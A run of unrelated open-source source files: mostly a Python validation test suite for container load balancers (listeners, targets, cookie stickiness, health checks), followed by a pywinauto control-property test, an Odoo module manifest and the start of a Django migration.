'-run{}'.format(experiment_id) os.makedirs(parent_dir, exist_ok=True) return parent_dir
ghliu/pytorch-ddpg
util.py
Python
apache-2.0
2,518
from common_fixtures import * # NOQA LB_IMAGE_UUID = "docker:sangeetha/lbtest:latest" CONTAINER_HOST_NAMES = ["container1", "container2", "container3"] containers_in_host = [] logger = logging.getLogger(__name__) @pytest.fixture(scope='session', autouse=True) def lb_targets(request, client): hosts = client.list_host(kind='docker', removed_null=True, state="active") assert len(hosts) > 1, "Need at least 2 hosts for executing Lb test cases" for n in range(0, 2): con_name = random_str() con1 = client.create_container(name=con_name, networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[n] }, requestedHostId=hosts[n].id ) con1 = client.wait_success(con1, timeout=180) containers_in_host.append(con1) def fin(): to_delete_con = [] for c in containers_in_host: if c.state in ("running" or "stopped"): to_delete_con.append(c) delete_all(client, to_delete_con) to_delete_lb = [] for i in client.list_loadBalancer(state='active'): try: if i.name.startswith('test-'): to_delete_lb.append(i) except AttributeError: pass delete_all(client, to_delete_lb) to_delete_lb_config = [] for i in client.list_loadBalancerConfig(state='active'): try: if i.name.startswith('test-'): to_delete_lb_config.append(i) except AttributeError: pass delete_all(client, to_delete_lb_config) to_delete_lb_listener = [] for i in client.list_loadBalancerListener(state='active'): try: if i.name.startswith('test-'): to_delete_lb_listener.append(i) except AttributeError: pass delete_all(client, to_delete_lb_listener) request.addfinalizer(fin) def create_lb_for_container_lifecycle(client, host, port): lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[2] }, requestedHostId=host.id ) con1 = client.wait_success(con1, timeout=180) lb = lb.addtarget(instanceId=con1.id) validate_add_target(client, con1, lb) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) return lb, con1 def create_lb_with_one_listener_one_host_two_targets(client, host, port, lb_config=None, lb_config_params=None, listener_algorithm=None, containers=None): """ This method creates a LB rule. Adds the host that is passed to LB. Adds targets to the host. These targets are the containers parameter if passed, else shared containers are used. If lb_config is not passed , a new LB configuration is created which has a Lb listener with listener_algorithm if it is provided.If listener_algorithm is not provided , then it gets defaulted to round_robin. If lb_config is passed , this LB configuration is used for the LB rule. If listener_algorithm parameter is passed , listener gets created with default listener algorithm(round robin). """ listener_config = {"name": random_str(), "sourcePort": port, "targetPort": '80', "sourceProtocol": 'http', "targetProtocol": 'http' } if listener_algorithm is not None: listener_config["algorithm"] = listener_algorithm if lb_config is None: # Create Listener listener = client.create_loadBalancerListener(**listener_config) listener = client.wait_success(listener) # Create LB Config if lb_config_params is not None: lb_config = client.create_loadBalancerConfig(name=random_str(), **lb_config_params) else: lb_config = client.create_loadBalancerConfig(name=random_str()) lb_config = client.wait_success(lb_config) lb_config = lb_config.addlistener(loadBalancerListenerId=listener.id) validate_add_listener(client, listener, lb_config) # Create LB lb = client.create_loadBalancer(name=random_str(), loadBalancerConfigId=lb_config.id) lb = client.wait_success(lb) assert lb.state == "active" # Add host to LB lb = lb.addhost(hostId=host.id) validate_add_host(client, host, lb) # Add container to LB if containers is None: # Add default containers to LB for n in range(0, 2): lb = lb.addtarget(instanceId=containers_in_host[n].id) validate_add_target(client, containers_in_host[n], lb) else: for container in containers: lb = lb.addtarget(instanceId=container.id) validate_add_target(client, container, lb) if lb_config_params is None and listener_algorithm is None \ and containers is None: con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) return lb, lb_config def test_lb_with_targets(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8081" logger.info("Create LB for 2 targets on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, "8081") delete_all(client, [lb]) def test_lb_add_host_target_in_parallel(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "9081" listener_config = {"name": random_str(), "sourcePort": port, "targetPort": '80', "sourceProtocol": 'http', "targetProtocol": 'http' } listener = client.create_loadBalancerListener(**listener_config) listener = client.wait_success(listener) lb_config = client.create_loadBalancerConfig(name=random_str()) listener = client.wait_success(listener) lb = client.create_loadBalancer(name=random_str(), loadBalancerConfigId=lb_config.id) lb = client.wait_success(lb) assert lb.state == "active" # Add host to LB , container to LB and listener to Lb config associated # with LB in parallel lb = lb.addhost(hostId=host.id) for n in range(0, 2): lb = lb.addtarget(instanceId=containers_in_host[n].id) lb_config = lb_config.addlistener(loadBalancerListenerId=listener.id) validate_add_listener(client, listener, lb_config) validate_add_host(client, host, lb) for n in range(0, 2): validate_add_target(client, containers_in_host[n], lb) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) delete_all(client, [lb]) def test_lb_add_target(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8082" logger.info("Create LB for 2 targets on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[2] }, requestedHostId=host.id ) con1 = client.wait_success(con1, timeout=180) # Add target to existing LB lb = lb.addtarget(instanceId=con1.id) validate_add_target(client, con1, lb) logger.info("Check LB access after adding target with container name: " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_remove_target(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8083" logger.info("Create LB for 2 targets on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[2] }, requestedHostId=host.id ) con1 = client.wait_success(con1, timeout=180) # Add target to existing LB lb = lb.addtarget(instanceId=con1.id) validate_add_target(client, con1, lb) logger.info("Check LB access after adding target with container name: " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) # Remove target to existing LB lb = lb.removetarget(instanceId=con1.id) validate_remove_target(client, con1, lb) logger.info("Check LB access after removing target with container name: " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_add_listener(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port1 = "8084" port2 = "8085" logger.info("Create LB for 2 targets on port - " + port1) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port1) # Create Listener listener = client.create_loadBalancerListener(name=random_str(), sourcePort=port2, targetPort='80', sourceProtocol='http', targetProtocol='http') listener = client.wait_success(listener) # Add listener to LB config which is associated to LB lb_config = lb_config.addlistener(loadBalancerListenerId=listener.id) validate_add_listener(client, listener, lb_config) logger.info("Check LB access after adding listener for port: " + port2) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port1) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port2) delete_all(client, [lb]) def test_lb_remove_listener(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port1 = "8086" port2 = "8087" logger.info("Create LB for 2 targets on port - " + port1) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port1) # Create Listener listener = client.create_loadBalancerListener(name=random_str(), sourcePort=port2, targetPort='80', sourceProtocol='http', targetProtocol='http') listener = client.wait_success(listener) # Add listener to LB config which is associated to LB lb_config = lb_config.addlistener(loadBalancerListenerId=listener.id) validate_add_listener(client, listener, lb_config) logger.info("Check LB access after adding listener for port: " + port2) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port1) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port2) # Remove listener to LB config which is associated to LB lb_config = lb_config.removelistener(loadBalancerListenerId=listener.id) validate_remove_listener(client, listener, lb_config) logger.info("Check LB access after removing listener for port: " + port2) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port1) check_no_access(host, port2) delete_all(client, [lb]) def test_lb_add_host(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 1 host = hosts[0] host2 = hosts[1] port = "8088" logger.info("Create LB for 2 targets on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) # Add host to existing LB lb = lb.addhost(hostId=host2.id) validate_add_host(client, host2, lb) logger.info("Check LB access after adding host: " + host.id) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) check_round_robin_access(con_hostname, host2, port) delete_all(client, [lb]) def test_lb_remove_host(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 1 host = hosts[0] host2 = hosts[1] port = "8089" logger.info("Create LB for 2 targets on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) # Add host to LB lb = lb.addhost(hostId=host2.id) validate_add_host(client, host2, lb) logger.info("Check LB access after adding host: " + host.id) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) check_round_robin_access(con_hostname, host2, port) # Remove host to LB lb = lb.removehost(hostId=host2.id) validate_remove_host(client, host2, lb) logger.info("Check LB access after removing host: " + host.id) check_round_robin_access(con_hostname, host, port) # Check no access on host2 - TBD check_no_access(host2, port) # Add host to LB lb = lb.addhost(hostId=host2.id) validate_add_host(client, host2, lb) logger.info("Check LB access after adding host: " + host.id) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) check_round_robin_access(con_hostname, host2, port) delete_all(client, [lb]) def test_lb_container_lifecycle_stop_start(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "9090" logger.info("Create LB for 2 targets on port - " + port) lb, con1 = create_lb_for_container_lifecycle(client, host, port) # Stop container con1 = client.wait_success(con1.stop()) assert con1.state == 'stopped' logger.info("Check LB access after stopping container " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) # Start Container con1 = client.wait_success(con1.start()) assert con1.state == 'running' logger.info("Check LB access after starting container " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_container_lifecycle_restart(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "9091" logger.info("Create LB for 3 targets on port - " + port) lb, con1 = create_lb_for_container_lifecycle(client, host, port) # Restart Container con1 = client.wait_success(con1.restart()) assert con1.state == 'running' logger.info( "Check LB access after restarting container " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) @pytest.mark.skipif(True, reason='not implemented yet') def test_lb_container_lifecycle_delete_restore(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "9092" logger.info("Create LB for 3 targets on port - " + port) lb, con1 = create_lb_for_container_lifecycle(client, host, port) # Delete Container con1 = client.wait_success(client.delete(con1)) assert con1.state == 'removed' logger.info("Check LB access after deleting container " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) # Restore Container con1 = client.wait_success(con1.restore()) assert con1.state == 'stopped' con1 = client.wait_success(con1.start()) assert con1.state == 'running' logger.info("Check LB access after restoring container " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_container_lifecycle_delete_purge(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "9093" logger.info("Create LB for 3 targets on port - " + port) lb, con1 = create_lb_for_container_lifecycle(client, host, port) # Delete Container and purge it con1 = client.wait_success(client.delete(con1)) assert con1.state == 'removed' con1 = client.wait_success(con1.purge()) logger.info("Check LB access after purging container " + CONTAINER_HOST_NAMES[2]) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) target_maps = client.list_loadBalancerTarget(loadBalancerId=lb.id, instanceId=con1.id) assert len(target_maps) == 1 target_map = target_maps[0] target_map = wait_for_condition(client, target_map, lambda x: x.state == 'removed', lambda x: 'State is: ' + x.state) assert target_map.state == "removed" delete_all(client, [lb]) def test_lb_add_target_in_different_host(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 1 host = hosts[0] host2 = hosts[1] port = "8091" logger.info("Create LB for 2 targets on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[2] }, requestedHostId=host2.id ) con1 = client.wait_success(con1, timeout=180) lb = lb.addtarget(instanceId=con1.id) validate_add_target(client, con1, lb) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_config_shared_by_2_lb_instances(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 1 host = hosts[0] host2 = hosts[1] port = "8092" logger.info("Create LB for 2 targets on port - " + port) lb1, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) # Create another LB using the same the Lb configuration lb2, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host2, port, lb_config) delete_all(client, [lb1, lb2]) def test_modify_lb_config_shared_by_2_lb_instances(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 1 host1 = hosts[0] host2 = hosts[1] port1 = "8093" port2 = "8094" logger.info("Create LB for 2 targets on port - " + port1 + "- host-" + str(host1.id)) # Create LB - LB1 lb1, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host1, port1) logger.info("Create LB for 2 targets on port - " + port1 + "- host-" + str(host2.id)) # Create another LB - LB2 using the same the Lb configuration lb2, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host2, port1, lb_config) # Add new listener to existing LB configuration that is attached to 2 LBs. listener1 = client.create_loadBalancerListener(name=random_str(), sourcePort=port2, targetPort='80', sourceProtocol='http', targetProtocol='http') listener1 = client.wait_success(listener1) # Add listener to lB config lb_config = lb_config.addlistener(loadBalancerListenerId=listener1.id) validate_add_listener(client, listener1, lb_config) # Check is new listener is associated with LB1 con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host1, port1) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host1, port2) # Check is new listener is associated with LB2 con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host2, port1) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host2, port2) # Remove listener from lB config lb_config = lb_config.removelistener(loadBalancerListenerId=listener1.id) validate_remove_listener(client, listener1, lb_config) # Check if removed listener is not associated with LB1 anymore con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host1, port1) check_no_access(host1, port2) # Check if removed listener is not associated with LB2 anymore con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host2, port1) check_no_access(host2, port2) delete_all(client, [lb1, lb2]) def test_reuse_port_after_lb_deletion(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "9000" logger.info("Create LB for 2 targets on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) lb = client.wait_success(client.delete(lb)) assert lb.state == 'removed' lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[2] }, requestedHostId=host.id ) con1 = client.wait_success(con1, timeout=180) lb = lb.addtarget(instanceId=con1.id) validate_add_target(client, con1, lb) con_hostname = CONTAINER_HOST_NAMES check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_for_container_with_port_mapping(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port1 = "9002" con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[0] }, ports=[port1+":80/tcp"], requestedHostId=host.id ) con1 = client.wait_success(con1, timeout=180) port2 = "9003" con2 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=LB_IMAGE_UUID, environment={'CONTAINER_NAME': CONTAINER_HOST_NAMES[1] }, ports=[port2+":80/tcp"], requestedHostId=host.id ) con2 = client.wait_success(con2, timeout=180) port = "9001" logger.info("Create LB for 2 targets which have port " "mappings on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets(client, host, port) # Check LB rule works con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) # Check exposed ports for containers work check_access(host, port1, CONTAINER_HOST_NAMES[0]) check_access(host, port2, CONTAINER_HOST_NAMES[1]) delete_all(client, [lb, con1, con2]) def test_lb_with_lb_cookie(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8095" logger.info("Create LB for 2 targets with lbCookieStickinessPolicy " + "on port - " + port) lbcookie_policy = {"lbCookieStickinessPolicy": {"mode": "insert", "cookie": "cookie-1", "indirect": True, "nocache": True, "postonly": False } } lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets( client, host, port, lb_config_params=lbcookie_policy ) con_hostname = CONTAINER_HOST_NAMES[0:2] check_for_lbcookie_policy(con_hostname, host, port) delete_all(client, [lb]) def test_lb_with_app_cookie(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8096" cookie_name = "appcookie1" logger.info("Create LB for 2 targets with appCookieStickinessPolicy " + "on port - " + port) appcookie_policy = {"appCookieStickinessPolicy": {"mode": "query_string", "requestLearn": True, "timeout": 3600000, "cookie": cookie_name, "maxLength": 40, "prefix": False } } lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets( client, host, port, lb_config_params=appcookie_policy ) con_hostname = CONTAINER_HOST_NAMES[0:2] check_for_appcookie_policy(con_hostname, host, port, cookie_name) delete_all(client, [lb]) def test_lb_with_health_check_with_uri(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8097" logger.info("Create LB for 2 targets with health check enabled " + "on port - " + port) health_check = {"healthCheck": {"interval": 2000, "responseTimeout": 2000, "healthyThreshold": 2, "unhealthyThreshold": 3, "uri": "GET /name.html" } } lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets( client, host, port, lb_config_params=health_check ) con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=TEST_IMAGE_UUID, requestedHostId=host.id ) con1 = client.wait_success(con1, timeout=180) lb = lb.addtarget(instanceId=con1.id) validate_add_target(client, con1, lb) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_with_health_check_without_uri(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8098" logger.info("Create LB for 2 targets with health check enabled " + "on port - " + port) health_check = {"healthCheck": {"interval": 2000, "responseTimeout": 2000, "healthyThreshold": 2, "unhealthyThreshold": 3 } } lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets( client, host, port, lb_config_params=health_check ) con1 = client.create_container(name=random_str(), networkMode=MANAGED_NETWORK, imageUuid=TEST_IMAGE_UUID, requestedHostId=host.id ) con1 = client.wait_success(con1, timeout=180) lb = lb.addtarget(instanceId=con1.id) validate_add_target(client, con1, lb) con_hostname = CONTAINER_HOST_NAMES[0:2] check_round_robin_access(con_hostname, host, port) delete_all(client, [lb, con1]) def test_lb_with_source(client): hosts = client.list_host(kind='docker', removed_null=True) assert len(hosts) > 0 host = hosts[0] port = "8101" logger.info("Create LB for 2 targets with source algorithm " + "on port - " + port) lb, lb_config = \ create_lb_with_one_listener_one_host_two_targets( client, host, port, listener_algorithm="source" ) con_hostname = CONTAINER_HOST_NAMES[0:2] check_for_stickiness(con_hostname, host, port) delete_all(client, [lb]) def check_round_robin_access(container_names, host, port): wait_until_lb_is_active(host, port) con_hostname = container_names[:] con_hostname_ordered = [] url = "http://" + host.ipAddresses()[0].address +\ ":" + port + "/name.html" logger.info(url) for n in range(0, len(con_hostname)): r = requests.get(url) response = r.text.strip("\n") logger.info(response) r.close() assert response in con_hostname con_hostname.remove(response) con_hostname_ordered.append(response) logger.info(con_hostname_ordered) i = 0 for n in range(0, 10): r = requests.get(url) response = r.text.strip("\n") r.close() logger.info(response) assert response == con_hostname_ordered[i] i = i + 1 if i == len(con_hostname_ordered): i = 0 def check_no_access(host, port): try: url = "http://" + host.ipAddresses()[0].address + ":" +\ port + "/name.html" requests.get(url) assert False except requests.ConnectionError: logger.info("Connection Error - " + url) def check_access(host, port, expected_response): url = "http://" + host.ipAddresses()[0].address + ":" +\ port + "/name.html" r = requests.get(url) response = r.text.strip("\n") logger.info(response) r.close() assert response == expected_response def check_for_appcookie_policy(container_names, host, port, cookie_name): wait_until_lb_is_active(host, port) con_hostname = container_names[:] url = "http://" + host.ipAddresses()[0].address + \ ":" + port + "/name.html" headers = {"Cookie": cookie_name + "=test123"} r = requests.get(url, headers=headers) sticky_response = r.text.strip("\n") logger.info(sticky_response) r.close() assert sticky_response in con_hostname for n in range(0, 10): r = requests.get(url, headers=headers) response = r.text.strip("\n") r.close() logger.info(response) assert response == sticky_response def check_for_lbcookie_policy(container_names, host, port): wait_until_lb_is_active(host, port) con_hostname = container_names[:] url = "http://" + host.ipAddresses()[0].address + \ ":" + port + "/name.html" session = requests.Session() r = session.get(url) sticky_response = r.text.strip("\n") logger.info(sticky_response) r.close() assert sticky_response in con_hostname for n in range(0, 10): r = session.get(url) response = r.text.strip("\n") r.close() logger.info(response) assert response == sticky_response def check_for_stickiness(container_names, host, port): wait_until_lb_is_active(host, port) con_hostname = container_names[:] url = "http://" + host.ipAddresses()[0].address + \ ":" + port + "/name.html" r = requests.get(url) sticky_response = r.text.strip("\n") logger.info(sticky_response) r.close() assert sticky_response in con_hostname for n in range(0, 10): r = requests.get(url) response = r.text.strip("\n") r.close() logger.info(response) assert response == sticky_response def validate_add_target(client, container, lb): target_maps = client.list_loadBalancerTarget(loadBalancerId=lb.id, instanceId=container.id) assert len(target_maps) == 1 target_map = target_maps[0] wait_for_condition( client, target_map, lambda x: x.state == "active", lambda x: 'State is: ' + x.state) def validate_remove_target(client, container, lb): target_maps = client.list_loadBalancerTarget(loadBalancerId=lb.id, instanceId=container.id) assert len(target_maps) == 1 target_map = target_maps[0] wait_for_condition( client, target_map, lambda x: x.state == "removed", lambda x: 'State is: ' + x.state) def validate_add_listener(client, listener, lb_config): lb_config_maps = client.\ list_loadBalancerConfigListenerMap(loadBalancerListenerId=listener.id, loadBalancerConfigId=lb_config.id) assert len(lb_config_maps) == 1 config_map = lb_config_maps[0] wait_for_condition( client, config_map, lambda x: x.state == "active", lambda x: 'State is: ' + x.state) def validate_remove_listener(client, listener, lb_config): lb_config_maps = client.\ list_loadBalancerConfigListenerMap(loadBalancerListenerId=listener.id, loadBalancerConfigId=lb_config.id) assert len(lb_config_maps) == 1 config_map = lb_config_maps[0] wait_for_condition( client, config_map, lambda x: x.state == "removed", lambda x: 'State is: ' + x.state) def validate_add_host(client, host, lb): host_maps = client.list_loadBalancerHostMap(loadBalancerId=lb.id, hostId=host.id, removed_null=True) assert len(host_maps) == 1 host_map = host_maps[0] wait_for_condition( client, host_map, lambda x: x.state == "active", lambda x: 'State is: ' + x.state) def validate_remove_host(client, host, lb): host_maps = client.list_loadBalancerHostMap(loadBalancerId=lb.id, hostId=host.id) assert len(host_maps) == 1 host_map = host_maps[0] wait_for_condition( client, host_map, lambda x: x.state == "removed", lambda x: 'State is: ' + x.state) def wait_until_lb_is_active(host, port, timeout=45): start = time.time() while check_for_no_access(host, port): time.sleep(.5) print "No access yet" if time.time() - start > timeout: raise Exception('Timed out waiting for LB to become active') return def check_for_no_access(host, port): try: url = "http://" + host.ipAddresses()[0].address + ":" +\ port + "/name.html" requests.get(url) return False except requests.ConnectionError: logger.info("Connection Error - " + url) return True
sonchang/validation-tests
tests/validation/cattlevalidationtest/core/test_lb.py
Python
apache-2.0
39,502
# GUI Application automation and testing library # Copyright (C) 2006 Mark Mc Mahon # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public License # as published by the Free Software Foundation; either version 2.1 # of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. # See the GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the # Free Software Foundation, Inc., # 59 Temple Place, # Suite 330, # Boston, MA 02111-1307 USA """Miscellaneous Control properties Test **What is checked** This checks various values related to a control in windows. The values tested are Class The class type of the control Style The Style of the control (GetWindowLong) ExStyle The Extended Style of the control (GetWindowLong) HelpID The Help ID of the control (GetWindowLong) ControlID The Control ID of the control (GetWindowLong) UserData The User Data of the control (GetWindowLong) Visibility Whether the control is visible or not **How is it checked** After retrieving the information for the control we compare it to the same information from the reference control. **When is a bug reported** If the information does not match then a bug is reported. **Bug Extra Information** The bug contains the following extra information Name Description ValueType What value is incorrect (see above), String Ref The reference value converted to a string, String Loc The localised value converted to a string, String **Is Reference dialog needed** This test will not run if the reference controls are not available. **False positive bug reports** Some values can change easily without any bug being caused, for example User Data is actually meant for programmers to store information for the control and this can change every time the software is run. **Test Identifier** The identifier for this test/bug is "MiscValues" """ __revision__ = "$Revision: 616 $" testname = "MiscValues" def MiscValuesTest(windows): "Return the bugs from checking miscelaneous values of a control" bugs = [] for win in windows: if not win.ref: continue diffs = {} if win.Class() != win.ref.Class(): diffs[u"Class"] = (win.Class(), win.ref.Class()) if win.Style() != win.ref.Style(): diffs[u"Style"] = (win.Style(), win.ref.Style()) if win.ExStyle() != win.ref.ExStyle(): diffs[u"ExStyle"] = (win.ExStyle(), win.ref.ExStyle()) if win.ContextHelpID() != win.ref.ContextHelpID(): diffs[u"HelpID"] = (win.ContextHelpID(), win.ref.ContextHelpID()) if win.ControlID() != win.ref.ControlID(): diffs[u"ControlID"] = (win.ControlID(), win.ref.ControlID()) if win.IsVisible() != win.ref.IsVisible(): diffs[u"Visibility"] = (win.IsVisible(), win.ref.IsVisible()) if win.UserData() != win.ref.UserData(): diffs[u"UserData"] = (win.UserData(), win.ref.UserData()) for diff, vals in diffs.items(): bugs.append(( [win, ], { "ValueType": diff, "Ref": unicode(vals[1]), "Loc": unicode(vals[0]), }, testname, 0,) ) return bugs
qspin/qtaste
demo/pywinauto-0.3.8/pywinauto/tests/miscvalues.py
Python
lgpl-3.0
3,745
# -*- coding: utf-8 -*- # Part of Odoo. See LICENSE file for full copyright and licensing details. { 'name': 'Margins in Sales Orders', 'version':'1.0', 'category': 'Sales', 'description': """ This module adds the 'Margin' on sales order. ============================================= This gives the profitability by calculating the difference between the Unit Price and Cost Price. """, 'depends':['sale'], 'demo':['data/sale_margin_demo.xml'], 'data':['security/ir.model.access.csv','views/sale_margin_view.xml'], }
chienlieu2017/it_management
odoo/addons/sale_margin/__manifest__.py
Python
gpl-3.0
552
# -*- coding: utf-8 -*- # Generated by Django 1.10.5 on 2017-01-08 13:14 from __future__ import unicode_literals import core.validators from django.db import migrations, models import django.db.models.deletion import django_date_extensions.fields class Migration(migrations.Migration): replaces = [('organize', '0001_initial'), ('organize', '0002_auto_20170107_1348'), ('organize', '0003_auto_20170107_1453'), ('organize', '0004_remove_eventapplication_rejection_reason')] initial = True dependencies = [ ('core', '0026_auto_20170107_0939'), ] operations = [ migrations.CreateModel( name='Coorganizer', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('email', models.EmailField(max_length=254)), ('first_name', models.CharField(max_length=30)), ('last_name', models.CharField(max_length=30)), ], options={ 'verbose_name': 'Co-organizer', 'verbose_name_plural': 'Co-organizers', }, ), migrations.CreateModel( name='EventApplication', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('date', django_date_extensions.fields.ApproximateDateField(validators=[core.validators.validate_approximatedate])), ('city', models.CharField(max_length=200)), ('country', models.CharField(max_length=200)), ('latlng', models.CharField(blank=True, max_length=30, null=True)), ('website_slug', models.SlugField()), ('main_organizer_email', models.EmailField(max_length=254)), ('main_organizer_first_name', models.CharField(max_length=30)), ('main_organizer_last_name', models.CharField(max_length=30)), ('created_at', models.DateTimeField(auto_now_add=True)), ('about_you', models.TextField()), ('why', models.TextField()), ('involvement', models.CharField(choices=[('newcomer', 'I’ve never been to a Django Girls event'), ('attendee', 'I’m a former attendee'), ('coach', 'I’m a former coach'), ('organizer', 'I’m a former organizer'), ('contributor', 'I contributed 